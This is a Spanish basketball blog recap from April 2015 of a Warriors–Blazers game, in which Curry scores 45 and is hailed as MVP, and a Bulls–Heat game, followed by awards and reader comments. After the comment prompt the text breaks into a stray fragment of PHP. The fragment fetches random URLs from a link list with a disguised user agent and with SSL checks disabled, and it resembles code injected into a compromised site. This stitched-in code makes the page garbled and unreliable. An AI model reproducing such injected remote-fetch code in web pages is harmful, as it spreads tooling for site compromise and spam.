La Crónica: Habemus MVP

10 de April de 2015 por MagicJohnson32

Se acabó la discusión. Que alguien prenda la fumata blanca. Si el espectacular balance de los Warriors no es suficiente, si no vale con el primer puesto de la regular season, debería bastar con actuaciones como la que presenciamos hace un par de horas para concluir que Stephen Curry es el MVP 2014-2015. Unos dignísimos Blazers sucumbieron ante Curry en el ORACLE, que se rindió a su ídolo. La madrugada se había abierto con un Bulls-Heat esquizofrénico, con dos partes radicalmente opuestas, y que deja a los de Spoelstra bastante tocados.

Os lo contamos todo a continuación.

Portland Trail Blazers 105 – Golden State Warriors 116

“M-V-P! M-V-P!”. Lo gritaba el ORACLE en los instantes finales del partido entre Warriors y Blazers; lo exigía Shaquille O’Neal desde el plató de la TNT tras la retransmisión del encuentro; y no nos queda más que unirnos a la petición del reconocimiento como mejor jugador de la temporada para Steph Curry, quien posiblemente se aseguró el galardón esta pasada madrugada con un recital que además llevó incorporados un par de récords. El base de los Warriors superó la marca que él mismo estableció hace dos años de más triples en una temporada (272) y además se convirtió en el primer jugador de la historia capaz de anotar 45 puntos con menos de 25 tiros de campo y menos de 5 tiros libres. Pero los datos y las palabras no alcanzan, ni de lejos, para describir lo que Curry hace sobre el parquet. No encontraron remedio los Blazers, capaces sin embargo de mantenerse en la contienda hasta ya cerca de la conclusión, cuando no pudieron más que ondear la bandera blanca ante la superioridad de los Warriors y un Curry en trance, autor de 19 puntos sin fallo en los últimos 7 minutos. Además de la derrota, los Blazers se llevaron de Oakland la lesión de Afflalo, que se retiró a vestuarios doliéndose del hombro y no regresó. Conociendo la fortuna que acostumbran a gastar en Portland, no descartemos un periodo de baja prolongado para el jugador que había sustituido al también lesionado Wes Matthews en el quinteto titular.

Chicago Bulls 89 – Miami Heat 78

Una segunda mitad calamitosa condenó a los Heat ante los Bulls y comprometió seriamente las posibilidades de Miami de colarse en Playoffs. Y eso que la noche pintaba francamente bien para los de Florida, dominadores claros del duelo al descanso después de un 12-33 en el segundo cuarto. Sin embargo, los 19 puntos de ventaja acumulados en la primera mitad se disiparon como un suspiro tras la reanudación, en la que los Heat necesitaron más de 5 minutos para anotar sus primeros puntos en lo que fue un presagio de lo que estaba por llegar. Y lo que estaba por llegar fue una actuación espantosa hasta la bocina final y un parcial acumulado en la segunda parte de 57-27 favorable a los Bulls, que se presentaron en Miami sin Butler pero contaron con Gasol, tan sólido como acostumbra, y un Taj Gibson que parece que va logrando la forma en el momento más adecuado de la temporada.

PREMIOS

MVP: 9 de 10 en tiros de 2, 8 de 13 en triples y 3 de 3 en tiros libres para 45 puntos logró Stephen Curry, numerazos para la historia que además llegaron acompañados de 10 asistencias. Por si no había quedado claro: ¡¡M-V-P!!

Rookie: No fue la noche más brillante de Mirotic pero aun así dejó su marca con dos triples consecutivos que hundieron definitivamente a los Heat. 9 puntos, 3 rebotes y 3 robos firmó el montenegrino.

Sorpresa: Cayó lesionado Afflalo pero dio un (nuevo) paso adelante McCollum (17 puntos con 8 de 14 en tiros), que se confirma como el mejor hombre de rotación de Stotts y al que todo apunta que vamos a ver bastantes minutos en cancha de ahora en adelante. Se lo ha ganado.

Decepción: Mal momento ha elegido Dwyane Wade para mancillar la excelente temporada que venía firmando. Anoche se quedó en 9 puntos con 4 de 20 en tiros y solo 3 asistencias por 5 pérdidas de balón. Van a necesitar mucho más los Heat de su estrella si quieren pelear esa octava plaza del Este.

Mayor esfuerzo en vano: Whiteside volvió a brillar frente a los Bulls, equipo ante el que se destapó con un triple doble en lo que supuso su puesta de largo en NBA. Sin alcanzar aquellas cotas, el pívot de los Heat fue el mejor de los suyos con 19 puntos (9 de 15 TC) y 16 rebotes. Reconozcamos también la actuación de la pareja Aldridge & Lillard, autores de 47 puntos, 12 rebotes y 12 asistencias en la derrota ante los Warriors.

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Tremendo Stpehen,que bien le hace al baloncesto este tío.Además de su cualidades y del balance, tiene el favor del aficionado,cae bien.Así que merecídisimo MVP si finalmente recae sobre él.

      Citar

  2. Ruxixón dice:
    #2

    Sobre la jornada de hoy (siguiente a la crónica):

    – Vaya falta le pitaron a Marc.Un gorro clarísimo que se convierten en 3 tiros libres para Hayward por obra y gracia del señor árbitro.Al final le tembló la mano al de Utah,falló su último TL y Memphis ganó por 1 punto. Gobert se merece el DPoY, me da igual que la muestra para darle el premio sea tan corta, otras veces han dado el premio a jugadores que estadísticamente lucían mucho en rebotes y tapones principalmente, pero no necesariamente premiaron un verdadero impacto defensivo. Con esa media temporada Gobert ha demostrado la significancia que tiene en la mejora defensiva de los Jazz y se ha demostrado tanto en la clasificación de conferencia como en la subida de Utah en las Team Stats.

    – Wittman ha dado descanso a Wall para ver como los Wizards pueden crecer sin él de cara a mejorar colectivamente con la mirada puesta en PO. Un equipo con hambre -Nets- les ha pasado por encima esta noche.así que casi imposible que se lleven factor cancha en PO. Parece como si estuvieran más orientados en evitar a Cleveland.

    – Los Spurs en velocidad de crucero,han ganado en Houston y encadenan ya 10 victorias.Terceros.

      Citar

  3. oli dice:
    #3

    Vi el partido y los spurs mira que me gusta como están jugando estos últimos años, pero me pareció excesivo el hack a Josh Smith, a pesar de esto los spurs me parecen que están en un momento de forma espectacular y si quedan segundos favoritos para para llegar mínimo a final de conferencia

      Citar

  4. Ruxixón dice:
    #4

    Es lo que tiene el “Hack a…”,no es que sea muy deportivo ero está permitido y por otra parte McHale también podía haber actuado quitando a Josh Smith.

    De hoy,casi muertas las opciones de Miami en los PO. Tendrían que ganar los 2 partido que les queda (Orlando,@76ers) y esperar que pierda todo Boston y/o Brooklyn (gana al desempate Miami) y al mismo tiempo que Indiana (pierde en caso de empate Miami) también pierda los 3 partidos que restan si sólo cae uno entre Celtics y Nets.

      Citar

  5. franitis dice:
    #5

    Pues Boston no baja el pistón, paliza a Cleveland y a falta de dos partidos, jugándoselo todo en el último con Bucks. Tremendo el PO Push de los verdes.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>